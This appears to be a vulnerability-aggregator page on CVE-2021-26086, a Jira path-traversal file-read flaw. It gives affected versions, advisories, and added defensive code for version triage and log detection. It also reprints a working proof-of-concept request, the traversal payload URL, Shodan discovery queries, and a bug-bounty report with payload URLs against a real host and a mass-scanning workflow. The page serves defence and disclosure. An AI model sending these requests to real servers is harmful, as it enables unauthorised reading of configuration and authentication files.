CVE-2021-26086
Published 2021-08-16
Priority P1 · 82 · medium · 5.3 CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2024-12-03
Exploited in the wild
EPSS 100.00% (100.0th percentile)
Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
Affected (16 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atlassian | jira_data_center | < 8.5.14 | 8.5.14 |
| atlassian | jira_data_center | >= 8.14.0 < unspecified | unspecified |
| atlassian | jira_data_center | >= 8.14.0 < 8.16.1 | 8.16.1 |
| atlassian | jira_data_center | >= 8.6.0 < unspecified | unspecified |
| atlassian | jira_data_center | >= 8.6.0 < 8.13.6 | 8.13.6 |
| atlassian | jira_data_center | >= unspecified < 8.5.14 | 8.5.14 |
| atlassian | jira_data_center | >= unspecified < 8.13.6 | 8.13.6 |
| atlassian | jira_data_center | >= unspecified < 8.16.1 | 8.16.1 |
| atlassian | jira_server | < 8.5.14 | 8.5.14 |
| atlassian | jira_server | >= 8.14.0 < unspecified | unspecified |
| atlassian | jira_server | >= 8.14.0 < 8.16.1 | 8.16.1 |
| atlassian | jira_server | >= 8.6.0 < unspecified | unspecified |
| atlassian | jira_server | >= 8.6.0 < 8.13.6 | 8.13.6 |
| atlassian | jira_server | >= unspecified < 8.5.14 | 8.5.14 |
| atlassian | jira_server | >= unspecified < 8.13.6 | 8.13.6 |
| atlassian | jira_server | >= unspecified < 8.16.1 | 8.16.1 |
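A triage helper for the three affected ranges stated in the advisory text above (before 8.5.14, 8.6.0 before 8.13.6, 8.14.0 before 8.16.1). This is an added example, not Atlassian's or this page's code; the hostnames and version strings in the sample inventory are constructed.

```python
"""Triage helper for CVE-2021-26086: decide whether a Jira Server / Data Center
version string falls in one of the three affected ranges stated in the advisory.
Added example, not Atlassian's or the aggregator's code."""
import re

# (inclusive lower bound or None, first fixed version) for each affected range,
# taken verbatim from the advisory text.
AFFECTED_RANGES = [
    (None, (8, 5, 14)),         # before 8.5.14
    ((8, 6, 0), (8, 13, 6)),    # from 8.6.0 before 8.13.6
    ((8, 14, 0), (8, 16, 1)),   # from 8.14.0 before 8.16.1
]

def parse_version(text):
    """Turn '8.13.5' (or '8.13.5-build123') into a comparable tuple (8, 13, 5)."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised Jira version string: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))

def is_affected(version):
    """True if the version lies inside any affected range (tuple comparison)."""
    v = parse_version(version)
    return any((low is None or v >= low) and v < fixed
               for low, fixed in AFFECTED_RANGES)

def triage(inventory):
    """Map host -> affected? for an {host: version} inventory; unparsable -> None."""
    result = {}
    for host, version in inventory.items():
        try:
            result[host] = is_affected(version)
        except ValueError:
            result[host] = None
    return result

if __name__ == "__main__":
    # constructed inventory: hostnames and versions are made up for the demo
    sample = {"jira-a.example": "8.13.5", "jira-b.example": "8.13.6",
              "jira-c.example": "8.16.0", "jira-d.example": "8.20.3"}
    for host, flag in triage(sample).items():
        print(host, "AFFECTED" if flag else "ok")
```

Note the gap between the ranges: 8.13.6 and 8.13.7 are not affected, but 8.14.0 through 8.16.0 are, so a plain "8.13.6 or newer is safe" rule would misclassify the 8.14.x and 8.15.x lines.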
Detection & IOCs (extracted from sources)
url: {{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml
- Detect exploitation attempts by matching HTTP GET requests with the path pattern /s/<token>/_/;/WEB-INF/ — the semicolon (;) before WEB-INF is the path traversal bypass token characteristic of this CVE.
- Validate exploitation by checking HTTP 200 responses containing the string '<web-app' in the response body, indicating a successful WEB-INF/web.xml file read.
- Monitor for requests targeting /WEB-INF/classes/seraph-config.xml via the traversal pattern, as this file contains authentication configuration and is a high-value target.
- Shodan queries 'http.component:"Atlassian Jira"' and 'http.component:"atlassian jira"' can be used to identify exposed Jira instances for proactive asset discovery.
- Affected versions are before 8.5.14, from 8.6.0 before 8.13.6, and from 8.14.0 before 8.16.1. Instances on 8.5.14 or later within 8.5.x, on 8.13.6 or later within 8.6.x through 8.13.x, or on 8.16.1 or later are not vulnerable.
- The vulnerability is unauthenticated (PR:N) and network-accessible (AV:N), meaning no credentials are required to exploit it remotely.
- This CVE is listed in CISA's Known Exploited Vulnerabilities catalog with a remediation due date of 2024-12-03, indicating active in-the-wild exploitation.
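The detection logic from the bullets above, as an added example (not the aggregator's or any vendor's rule): it percent-decodes each request path and flags the /s/<token>/_/;/WEB-INF/ pattern in access-log lines, marking 200 responses with a body as likely successful reads. The combined log format, field names and sample lines are assumptions; the log lines are constructed, not captured traffic.

```python
"""Flag access-log entries matching the CVE-2021-26086 traversal pattern
/s/<token>/_/;/WEB-INF/... described above. Added example, not the aggregator's
own rule; the log lines are constructed, not captured traffic."""
import re
from urllib.parse import unquote

# Combined log format (assumed): ip ident user [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# The page's pattern: a /s/<token>/_/ prefix followed by a ';' segment and WEB-INF.
# Applied after percent-decoding so %3B / %2F variants are caught as well.
TRAVERSAL_RE = re.compile(r"/s/[^/]+/_/;[^/]*/WEB-INF/", re.IGNORECASE)

def normalize_path(raw_path):
    """Drop the query string and percent-decode twice (catches double encoding)."""
    return unquote(unquote(raw_path.split("?", 1)[0]))

def classify(line):
    """Return None for benign lines, else a dict describing the suspicious request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, raw_path, status, size = m.groups()
    path = normalize_path(raw_path)
    if not TRAVERSAL_RE.search(path):
        return None
    # A 200 with a non-empty body is the strongest signal that the file was served;
    # other statuses are attempts worth alerting on but not confirmed reads.
    return {"src": src, "time": ts, "method": method, "path": path,
            "status": int(status),
            "likely_success": status == "200" and size not in ("-", "0")}

def scan(lines):
    """Run classify() over an iterable of log lines and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

SAMPLE_LOG = [  # constructed: RFC 5737 documentation addresses, made-up timestamps
    '203.0.113.7 - - [18/Nov/2023:10:01:02 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 18422',
    '203.0.113.7 - - [18/Nov/2023:10:01:05 +0000] "GET /s/abc/_/%3B/WEB-INF/classes/seraph-config.xml HTTP/1.1" 200 3100',
    '198.51.100.4 - - [18/Nov/2023:10:02:00 +0000] "GET /s/d41d8cd9/_/download/resources/global.css HTTP/1.1" 200 51231',
    '198.51.100.9 - - [18/Nov/2023:10:03:00 +0000] "GET /s/x/_/;/WEB-INF/web.xml HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["src"], hit["status"], hit["path"],
              "CONFIRMED" if hit["likely_success"] else "attempt")
```

The third sample line is a legitimate Jira static-resource request under the same /s/<token>/_/ prefix and is not flagged, which is the false-positive case a rule on "/s/" alone would hit.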
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 5.3 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| nvd | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | | 5.3 | MEDIUM | |
| cisa | | 5.3 | MEDIUM | |
CISA
Atlassian Jira Server and Data Center Path Traversal Vulnerability
cisa·2024-11-12·CVSS 5.3
CVE-2021-26086 [MEDIUM] CWE-22 Atlassian Jira Server and Data Center Path Traversal Vulnerability
Vulnerability: Atlassian Jira Server and Data Center Path Traversal Vulnerability
Affected: Atlassian Jira Server and Data Center
Atlassian Jira Server and Data Center contain a path traversal vulnerability that allows a remote attacker to read particular files in the /WEB-INF/web.xml endpoint.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://jira.atlassian.com/browse/JRASERVER-72695 ; https://nvd.nist.gov/vuln/detail/CVE-2021-26086
Remediation Due Date: 2024-12-03
GHSA
GHSA-vvhj-8w7x-qj58: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /
ghsa_unreviewed·2022-05-24
CVE-2021-26086 [MEDIUM] CWE-22 GHSA-vvhj-8w7x-qj58: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /
Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
VulnCheck
Atlassian Jira Server and Data Center Path Traversal Vulnerability
vulncheck·2021·CVSS 5.3
CVE-2021-26086 [MEDIUM] CWE-22 Atlassian Jira Server and Data Center Path Traversal Vulnerability
Atlassian Jira Server and Data Center Path Traversal Vulnerability
Atlassian Jira Server and Data Center contain a path traversal vulnerability that allows a remote attacker to read particular files in the /WEB-INF/web.xml endpoint.
Affected: Atlassian Jira Server and Data Center
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_type=src&vulnerability=cve-2021-26086; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cve-2021-26086; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-23&host_type=
No detection rules found.
Exploit-DB
Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
exploitdb·2021-10-06·CVSS 5.3
CVE-2021-26086 [MEDIUM] Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
---
```text
# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086

POC File #1 - web.xml

GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a
```
Nuclei
Atlassian Jira Limited - Local File Inclusion
nuclei·CVSS 5.3
CVE-2021-26086 [MEDIUM] Atlassian Jira Limited - Local File Inclusion
Atlassian Jira Limited - Local File Inclusion
Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
Template:
```yaml
id: CVE-2021-26086
info:
  name: Atlassian Jira Limited - Local File Inclusion
  author: cocxanh
  severity: medium
  description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
  impact: |
    This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading t
```
Recorded Future
Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
blogs_recorded_future·CVSS 9.6
[CRITICAL] Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
## Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
For years, software solutions built by Atlassian have found their way to nearly every organization's software stack. Tools such as JIRA, Confluence, Bamboo, and BitBucket are often seen playing a crucial role in various departments across enterprises.
From managing projects or handling organization-wide documentation, to hosting the very code of a product being developed by the organization, the constant reliance upon and amount of historical data held within these applications have turned them into a lucrative target for attackers, expanding the attack surface in the process.
## Historical Atlassian Vulnerabilities
Traditionally, vulnerabilities within the Atlassian software stack have originated from d
Greynoiseio
Spike in Atlassian Exploitation Attempts: Patching is Crucial
blogs_greynoiseio
Spike in Atlassian Exploitation Attempts: Patching is Crucial
HackerOne
Path Traversal CVE-2021-26086 CVE-2021-26085
hackerone·2021-11-05·CVSS 5.3
CVE-2021-26086 [MEDIUM] Path Traversal CVE-2021-26086 CVE-2021-26085
Path Traversal CVE-2021-26086 CVE-2021-26085
These vulnerabilities were found with https://trickest.com https://trickest.io
CVE-2021-26085:
>https://jira.mariadb.org:/s/123cfx/_/;/WEB-INF/web.xml
CVE-2021-26086:
>https://jira.mariadb.org/s/cfx/_/;/WEB-INF/web.xml
Video explanation:
### Node EOF-RAW-DATA
- Found Jira hosts from various bug bounty programs; convert to file
### Node SED-ADD-AT-BEGINNING
- Append https:// to every line
### Node PASTE-JIRA-PATHS
- Converts Jira paths to file
### Node MEG (tool)
- Requesting URLs and paths from the file
### Node IS-IT-JIRA?
- Checking if the requested URL is Jira
### Node TAKE-JIRA-URLs
- Parsing previous nodes to get raw URLs
### Node CVE-2021-26086
- Converts payloads to a file
### Node CVE-2021-26085
- Converts payloads to a file
References:
- http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html
- https://jira.atlassian.com/browse/JRASERVER-72695
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-26086

Timeline:
- 2021-08-16: Published
- 2024-11-12: Added to CISA KEV
- Exploited in the wild